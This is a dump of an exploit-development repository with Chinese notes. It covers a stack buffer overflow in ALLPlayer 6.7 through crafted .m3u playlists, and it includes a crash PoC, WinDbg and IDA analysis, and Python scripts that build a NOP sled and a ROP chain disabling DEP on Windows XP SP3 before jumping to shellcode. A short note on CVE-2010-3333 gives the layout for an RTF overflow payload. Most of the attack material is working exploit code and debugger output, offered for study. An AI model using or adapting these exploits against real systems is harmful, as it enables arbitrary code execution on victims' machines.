2)利用SEH 160 | 161 | 在栈中布置shellcode同时覆盖SEH, 162 | 然后利用rop结合ZwSetInformationProcess关掉DEP 163 | 最后跳转到栈中执行shellcode 164 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer_Poc.m3u: -------------------------------------------------------------------------------- 1 | 
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/analysis.txt: -------------------------------------------------------------------------------- 1 | 1.结合poc定位漏洞 2 | ### 从github上找到了poc,用ALLPlayer打开poc生成的ALLPlayer_Poc.m3u,程序崩溃 3 | This exception may be expected and handled. 
4 | eax=00120041 ebx=066bb35c ecx=00130000 edx=066bc8d4 esi=00001390 edi=00000000 5 | eip=7c932f4e esp=0012ea2c ebp=0012ea2c iopl=0 nv up ei pl nz na pe nc 6 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 7 | ntdll!wcscpy+0xe: 8 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 9 | 10 | ntdll!wcscpy: ### wcscpy把从src地址开始且含有'\0000'结束符的字符串复制到以dest开始的地址空间,返回值的类型为wchar_t* #Unicode 11 | 7c932f40 8bff mov edi,edi 12 | 7c932f42 55 push ebp 13 | 7c932f43 8bec mov ebp,esp 14 | 7c932f45 8b4d08 mov ecx,dword ptr [ebp+8] #char *strDestination 15 | 7c932f48 8b550c mov edx,dword ptr [ebp+0Ch] #char *strSource 16 | 17 | 7c932f4b 668b02 mov ax,word ptr [edx] 18 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 19 | #wcscpy函数 20 | # __int16 *__cdecl wcscpy(__int16 *a1, __int16 *a2) 21 | # { 22 | # __int16 *des; // ecx 23 | # __int16 *sou; // edx 24 | # __int16 index; // ax 25 | 26 | # des = a1; 27 | # sou = a2; 28 | # do 29 | # { 30 | # index = *sou; 31 | # *des = *sou; 32 | # ++des; 33 | # ++sou; 34 | # } 35 | # while ( index ); 36 | # return a1; 37 | # } 38 | # 39 | 0:000> dd ebp 40 | 0012ea2c 0012ea60 7c80bb10 0012ea88 066bb35c 41 | 42 | 0:000> dd 0012ea88 43 | 0012ea88 00740068 00700074 002f003a 0041002f 44 | 0012ea98 00410041 00410041 00410041 00410041 45 | 0012eaa8 00410041 00410041 00410041 00410041 46 | 0012eab8 00410041 00410041 00410041 00410041 47 | 0012eac8 00410041 00410041 00410041 00410041 48 | 0012ead8 00410041 00410041 00410041 00410041 49 | 0012eae8 00410041 00410041 00410041 00410041 50 | 0012eaf8 00410041 00410041 00410041 00410041 51 | 52 | 0:000> dd 066bb35c 53 | 066bb35c 00740068 00700074 002f003a 0041002f 54 | 066bb36c 00410041 00410041 00410041 00410041 55 | 066bb37c 00410041 00410041 00410041 00410041 56 | 066bb38c 00410041 00410041 00410041 00410041 57 | 066bb39c 00410041 00410041 00410041 00410041 58 | 066bb3ac 00410041 00410041 00410041 00410041 59 | 066bb3bc 00410041 00410041 00410041 00410041 60 | 066bb3cc 
00410041 00410041 00410041 00410041 61 | 62 | 63 | 0:000> kv 64 | ChildEBP RetAddr Args to Child 65 | 0012ea2c 7c80bb10 0012ea88 066cb35c 00000000 ntdll!wcscpy+0xe (FPO: [Non-Fpo]) 66 | 0012ea60 00699632 0012ea88 066cb35c 0012ecf0 kernel32!lstrcpyW+0x1c (FPO: [Non-Fpo]) 67 | WARNING: Stack unwind information not available. Following frames may be wrong. 68 | 0012ecdc 00410041 00410041 00410041 00410041 ALLPlayer!TMethodImplementationIntercept+0x22cb3e 69 | 0012ece0 00410041 00410041 00410041 00410041 ALLPlayer+0x10041 70 | ##可以看到ALLPlayer!TMethodImplementationIntercept+0x22cb3e是ntdll!wcscpy的调用者 71 | 72 | #在ida中找到ALLPlayer!TMethodImplementationIntercept+0x22cb3e处 73 | .text:0069960A loc_69960A: ; CODE XREF: .text:006995FC↑j 74 | .text:0069960A push ebx 75 | .text:0069960B call lstrlenW_0_0 76 | .text:00699610 mov esi, eax 77 | .text:00699612 inc esi 78 | .text:00699613 lea eax, [ebp-254h] 79 | .text:00699619 xor ecx, ecx 80 | .text:0069961B mov edx, 104h 81 | .text:00699620 call sub_407B64 82 | .text:00699625 push ebx <-------------- 源字符串 83 | .text:00699626 lea eax, [ebp-254h] 84 | .text:0069962C push eax <---------------目标缓冲区 85 | .text:0069962D call lstrcpyW <-------------- 崩溃触发点 86 | .text:00699632 mov eax, [ebp+8] 87 | 88 | #在该函数中下断再重新打开ALLPlayer_Poc.m3u,断下 89 | 0:005> bp ALLPlayer!TMethodImplementationIntercept+0x22cb1e 90 | 0:005> g 91 | Breakpoint 1 hit 92 | eax=0000138f ebx=066bb35c ecx=7c809ac6 edx=0000000a esi=0000138f edi=00000000 93 | eip=00699612 esp=0012ea70 ebp=0012ecdc iopl=0 nv up ei ng nz na pe nc 94 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 95 | ALLPlayer!TMethodImplementationIntercept+0x22cb1e: 96 | 00699612 46 inc esi 97 | 98 | 0:000> dd eax 99 | 0012ea88 00000000 00000000 00000000 00000000 100 | 0012ea98 00000000 00000000 00000000 00000000 101 | 0012eaa8 00000000 00000000 00000000 00000000 102 | 0012eab8 00000000 00000000 00000000 00000000 103 | 0012eac8 00000000 00000000 00000000 00000000 104 | 0012ead8 00000000 00000000 
00000000 00000000 105 | 0012eae8 00000000 00000000 00000000 00000000 106 | 0012eaf8 00000000 00000000 00000000 00000000 107 | 0:000> dd ebx 108 | 066bb35c 00740068 00700074 002f003a 0041002f 109 | 066bb36c 00410041 00410041 00410041 00410041 110 | 066bb37c 00410041 00410041 00410041 00410041 111 | 066bb38c 00410041 00410041 00410041 00410041 112 | 066bb39c 00410041 00410041 00410041 00410041 113 | 066bb3ac 00410041 00410041 00410041 00410041 114 | 066bb3bc 00410041 00410041 00410041 00410041 115 | 066bb3cc 00410041 00410041 00410041 00410041 116 | 0:000> dd esp 117 | 0012ea6c 066bb35c 0012ecf0 00699791 0012ecdc 118 | 0012ea7c 00b55bf8 066bb35c 00000000 00000000 119 | 0012ea8c 00000000 00000000 00000000 00000000 120 | 0012ea9c 00000000 00000000 00000000 00000000 121 | 0012eaac 00000000 00000000 00000000 00000000 122 | 0012eabc 00000000 00000000 00000000 00000000 123 | 0012eacc 00000000 00000000 00000000 00000000 124 | 0012eadc 00000000 00000000 00000000 00000000 125 | 126 | ##至此可以确定这是一个栈溢出: lstrcpyW 按 '\0' 结束符无界拷贝, 前面虽然算出了 esi = lstrlenW(ebx)+1, 却没有用它限制拷贝长度(从 sub_407B64(eax=缓冲区, edx=104h, ecx=0) 的调用形式推测目标缓冲区只按 0x104 字节清零/预留, 待确认). 目标缓冲区位于 [ebp-254h]: 断点处 ebp=0012ecdc, eax=0012ea88, 二者相差正好 0x254, 所以源串超过 0x258 字节(300 个 UTF-16 字符)就会覆盖 ebp+4 处的返回地址; poc 的 5000 个 'A' 被转成 10000 字节的宽字符串, 一直写到 00130000 越过栈的可写范围才触发上面的异常. 修复应改用带长度上限的 lstrcpynW(dst, src, 缓冲区大小), 或先用 lstrlenW 的结果做检查再拷贝. 127 | # 128 | 2.漏洞利用 129 | 障碍:实验环境winxp sp3 开启了DEP保护 130 | 思路: 131 | 1)通过构造ROP构造出可以执行的内存块 132 | 2)利用SEH 133 | 在栈中布置shellcode同时覆盖SEH, 134 | 然后利用rop结合ZwSetInformationProcess关掉DEP 135 | 最后跳转到栈中执行shellcode 136 | 注: 本目录的 exp.py/exp1.py 实际采用的是覆盖返回地址的路线而不是 SEH: 用 NOP 填到保存的 ebp(0012ecdc)为止, 紧接着在 ebp+4 处放 ntdll 里 MOV EAX,1/RETN(0x7c92e252) 的地址, 再经修正 EBP、增大 ESP、JMP ESP 等 gadget 进入 ntdll 0x7c93cd24 处关闭 DEP 的代码. 这些地址是为实验机那一版 XP SP3 ntdll.dll 硬编码的(XP 没有 ASLR, 但换一个补丁级别地址就会变), 而且通过 ZwSetInformationProcess 修改进程 DEP 标志的手法一般只在系统 DEP 策略为 OptIn/OptOut 时有效, AlwaysOn 下不适用. 137 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/calc.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | import codecs 4 | import cStringIO 5 | filename = 'rekt.m3u' 6 | 7 | shellcode = '' 
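# ROP chain for the XP SP3 DEP bypass.  Every 4-byte address is written as
# two UTF-16 code units, low word first, so 0x7C92E252 becomes u"\ue252\u7c92"
# and ends up as the bytes 52 E2 92 7C on disk.  The addresses are hard-coded
# for the one ntdll.dll build of the test machine (XP has no ASLR, but any
# other service pack / hotfix level needs them re-found; see the lookup notes
# at the bottom).  Code units 0xD800-0xDFFF cannot be produced this way
# (Python 3's UTF-16 encoder rejects lone surrogates) and 0x0000/0x000A/0x000D
# would terminate the line, so gadgets containing such words are unusable.
shellcode += u"\ue252\u7c92"  # 0x7C92E252  ntdll: MOV EAX,1 ; RETN
shellcode += u"\u8b85\u5d1d"  # 0x5D1D8B85  PUSH ESP ; POP EBP ; RETN 4  (fix EBP)
# NOTE: this used to read u"\u8885\u5d1D", i.e. 0x5D1D8885 -- a typo.  Both the
# note below and the C byte string ("\x85\x8B\x1D\x5D") give 0x5D1D8B85.
# exp1.py in this directory still carries the \u8885 form.
shellcode += u"\u4a19\u7c97"  # 0x7C974A19  raise ESP
shellcode += u"\uc1b4\u7dc5"  # 0x7DC5C1B4  JMP ESP
shellcode += u"\ucd24\u7c93"  # 0x7C93CD24  ntdll: start of the DEP-disabling code
shellcode += u"\u33e9\uffff"  # E9 33 FF FF FF: JMP back into the NOP sled ...
shellcode += u"\u90ff\u9090"  # ... last byte of that jmp, then NOPs

junk = "http://a"

# NOP sled sized to end exactly on the saved EBP.  At the lstrcpyW call the
# destination buffer starts at 0x0012ea88 (see the dump below); "http://a" is
# 16 bytes on disk, so the sled starts at 0x0012ea98, and ebp is 0x0012ecdc.
# Each u"\u9090\u9090" is 4 bytes, so 146 units = 584 bytes and the next 4
# bytes written land on the return address at ebp+4 (0x0012ece0).  Floor
# division keeps the count an int on Python 3 (plain "/" would give a float
# and the string multiply would fail).
filler = u"\u9090\u9090" * ((0x0012ecdc - 0x0012ea98) // 4 + 1)

# rekt.m3u is the offset-calibration file: only the sled is written.
# Uncommenting "+ shellcode" puts the first gadget address over the return
# address.
payload = junk + filler  # + shellcode

# 'UTF-16' prepends a BOM (FF FE) and writes little-endian code units.  The
# dump below shows the line reaching the stack intact, so the player's m3u
# parser evidently tolerates the BOM; switch to 'utf-16-le' if a different
# parser does not.
with codecs.open(filename, 'w', 'UTF-16') as out:
    out.write(payload)
print('[*] File created')
# len() counts UTF-16 code units, not bytes; the file is 2*len + 2 (BOM) bytes.
print('[*] With {} code units ({} bytes on disk)'.format(len(payload), 2 * len(payload) + 2))

# Stack layout at the breakpoint in analysis.txt:
# 0012ea88 00000000 00000000 00000000 00000000 <- eax, destination buffer
# 0012ea98                                       <- first byte after "http://a"
# 0012ecdc 0012ed6c 0088f09f 7fe90010 066bb35c <- ebp; return address at ebp+4
#
# Gadget lookup results (XP SP3):
# Found:MOV EAX,0x1 RET at 0x7c92e252 Module: C:\WINDOWS\system32\ntdll.dll
# Found:disable DEP at 0x7c93cd24 Module: C:\WINDOWS\system32\ntdll.dll
# PUSH ESP / POP EBP / RETN 04 at 0x5D1D8B85 is used to fix EBP
#
# The same chain as a C byte string (one byte per \x, little-endian):
# "..."
# "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
# "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
# "\x90\x90\x90\x90"
# "\x52\xE2\x92\x7C" // MOV EAX,1 RETN
# "\x85\x8B\x1D\x5D" // fix EBP
# "\x19\x4A\x97\x7C" // raise ESP
# "\xB4\xC1\xC5\x7D" // jmp esp
# "\x24\xCD\x93\x7C" // start of the DEP-disabling code
# "\xE9\x33\xFF\xFF" // backward jmp
# "\xFF\x90\x90\x90"
#
# windbg dump after loading rekt.m3u (presumably at the same breakpoint as in
# analysis.txt).  Raw debugger output must stay commented or the file will
# not parse; the "dd esp" dump that follows this block still needs the same
# treatment.
# 0:000> dd 0012ea70
# 0012ea70 0012ecf0 00699791 0012ecdc 00b55bf8
# 0012ea80 0512efec 00000000 00740068 00700074
# 0012ea90 002f003a 0061002f 90909090 90909090
# 0012eaa0 90909090 90909090 90909090 90909090
# 0012eab0 90909090 90909090 90909090 90909090
# 0012eac0 90909090 90909090 90909090 90909090
# 0012ead0 90909090 90909090 90909090 90909090
# 0012eae0 90909090 90909090 90909090 90909090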
| 61 | 0:000> dd esp 62 | 0012ea64 0012ea70 0069976e 0012ecdc 0012ecf0 63 | 0012ea74 00699791 0012ecdc 00b55bf8 0512efec 64 | 0012ea84 00000000 00740068 00700074 002f003a 65 | 0012ea94 0061002f 90909090 90909090 90909090 66 | 0012eaa4 90909090 90909090 90909090 90909090 67 | 0012eab4 90909090 90909090 90909090 90909090 68 | 0012eac4 90909090 90909090 90909090 90909090 69 | 0012ead4 90909090 90909090 90909090 90909090 70 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/exp1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | import codecs 4 | import cStringIO 5 | filename = 'calc.m3u' 6 | 7 | junk = "http://a" 8 | 9 | buffer = u"\u9090\u9090" * (200 - 50) 10 | 11 | # moonagirl = u'\uDB33\u6853\u6C72\u2020\u6E68\u6761\u6869\u6D20\u6F6F\u6968' 12 | # moonagirl += u'\u6120\u8B6D\u53C4\u5050\uB853\u07EA\u77D5\uD0FF\uB853' 13 | # moonagirl += u'\uCAFA\u7C81\uD0FF' 14 | 15 | shellcode = u"\ucccc\ucccc" 16 | shellcode += u"\ue252\u7c92" #MOV EAX,1 RETN 地址 17 | #shellcode += u'\u00cc\u00cc' 18 | #shellcode += u'\u002d\u004f' 19 | shellcode += u"\uaef5\u0078" #MOV EAX,1 RETN 地址 20 | shellcode += u"\u8885\u5d1D" #修正 EBP 21 | shellcode += u"\u4a19\u7c97" #增大 ESP 22 | shellcode += u"\uc1B4\u7dC5" #jmp esp 23 | shellcode += u"\uCD24\u7c93" #关闭 DEP 代码的起始位置 24 | shellcode += u"\u33E9\uFFFF" #回跳指令 25 | shellcode += u"\u90FF\u9090" 26 | 27 | payload = junk + buffer + shellcode 28 | data = codecs.open(filename,'w','UTF-16') 29 | data.write(payload) 30 | data.close() 31 | print '[*] File created' 32 | print '[*] With {} bytes'.format(len(payload)) 33 | 34 | 35 | 36 | 37 | 38 | # shellcode = '' 39 | # shellcode += u"\ue252\u7c92" #MOV EAX,1 RETN 地址 40 | # shellcode += u"\u8885\u5d1D" #修正 EBP 41 | # shellcode += u"\u4a19\u7c97" #增大 ESP 42 | # shellcode += u"\uc1B4\u7dC5" #jmp esp 43 | # shellcode += 
u"\uCD24\u7c93" #关闭 DEP 代码的起始位置 44 | # shellcode += u"\u33E9\uFFFF" #回跳指令 45 | # shellcode += u"\u90FF\u9090" 46 | 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.dll -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.idb -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/player.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/player.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/poc.py: -------------------------------------------------------------------------------- 1 | junk = "http://" 2 | buffer="\x41" * 5000 3 | exploit = junk + buffer 4 | 5 | try: 6 | out_file = open("ALLPlayer_Poc.m3u",'w') 7 | out_file.write(exploit) 8 | out_file.close() 9 | print "Exploit file created!" 
10 | except: 11 | print "Error" -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/rekt.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/rekt.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/1.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/MSO.DLL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/MSO.DLL -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | 由于Word中的RTF分析器在解析pFragments属性值时,没有正确计算属性值所占用的空间大小,只要复制的数据大小超过0x14即可覆盖到函数返回地址, 4 | 进而控制程序的执行流程,用于执行恶意程序。 5 | 6 | (这里RTF分析器在复制数据时会把每两个相邻的数字解析成一个16进制数转成对应的ascii复制进内存。例如:在rtf中是30复制进内存被解析成0。 7 | 因此0x14个字节在rtf中要用40个垃圾字符来填充。) 8 | 9 | ## 漏洞利用 10 | 11 | 我们只需将返回地址用jmp esp指令地址覆盖,例如: 12 | 13 | ‘a’ * 40 + (jmp esp地址) 14 | 15 | 然后将shellcode放在后面,即可执行任意代码。由于漏洞函数返回前会弹出0x14大小的栈空间,因此我们需要填充一些垃圾字符。 16 | 例如: 17 | 18 | ‘a’*40 + (jmp esp地址) + 'a'*40 + shellcode. 
